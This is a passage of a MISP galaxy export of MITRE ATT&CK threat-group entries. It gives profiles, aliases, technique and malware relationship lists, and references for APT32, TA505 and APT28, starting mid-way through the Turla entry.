uses: misp-galaxy:mitre-malware="ComRAT - S0126" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Carbon - S0335" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PowerStallion - S0393" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="LightNeuron - S0395" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1588.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtual Private Server - T1584.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Services - T1584.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Server - T1584.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HyperStack - S0537" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Crutch - S0538" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="IronNetInjector - S0581" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Penquin - S0587" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1553.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

Table 4495. Table References
Links
https://attack.mitre.org/groups/G0010
https://securelist.com/the-epic-turla-operation/65545/
https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/
https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf
https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf
https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1
https://securelist.com/introducing-whitebear/81638/
https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

APT32 - G0050

[APT32](https://attack.mitre.org/groups/G0050) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)

The tag is: misp-galaxy:mitre-intrusion-set="APT32 - G0050"

APT32 - G0050 is also known as:

APT32
SeaLotus
OceanLotus
APT-C-00

View relationships graph

APT32 - G0050 has relationships with:

similar: misp-galaxy:threat-actor="APT32" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="KOMPROGO - S0156" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="WINDSHIELD - S0155" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Denis - S0354" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SOUNDBITE - S0157" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PHOREAL - S0158" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Arp - S0099" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="OSX_OCEANLOTUS.D - S0352" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Goopy - S0477" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Upload Malware - T1608.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Kerrdown - S0585" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4496. Table References
Links
https://attack.mitre.org/groups/G0050
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/
https://www.cybereason.com/blog/operation-cobalt-kitty-apt
https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf

TA505 - G0092

[TA505](https://attack.mitre.org/groups/G0092) is a financially motivated threat group that has been active since at least 2014. The group is known for frequently changing malware and driving global trends in criminal malware distribution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)

The tag is: misp-galaxy:mitre-intrusion-set="TA505 - G0092"

TA505 - G0092 is also known as:

TA505
Hive0065

View relationships graph

TA505 - G0092 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TrickBot - S0266" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FlawedAmmyy - S0381" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ServHelper - S0382" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FlawedGrace - S0383" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Dridex - S0384" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SDBbot - S0461" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Get2 - S0460" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Clop - S0611" with estimative-language:likelihood-probability="almost-certain"

Table 4497. Table References
Links
https://attack.mitre.org/groups/G0092
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter
https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times
https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505
https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

APT28 - G0007

[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019)

[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).

The tag is: misp-galaxy:mitre-intrusion-set="APT28 - G0007"

APT28 - G0007 is also known as:

APT28
SNAKEMACKEREL
Swallowtail
Group 74
Sednit
Sofacy
Pawn Storm
Fancy Bear
STRONTIUM
Tsar Team
Threat Group-4127
TG-4127

View relationships graph

APT28 - G0007 has relationships with:

similar: misp-galaxy:microsoft-activity-group="STRONTIUM" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="Sofacy" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="USBStealer - S0136" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HIDEDRV - S0135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Responder - S0174" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="DealersChoice - S0243" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ADVSTORESHELL - S0045" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="OLDBAIT - S0138" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="XAgentOSX - S0161" with estimative-language:likelihood-probability="almost-certain"
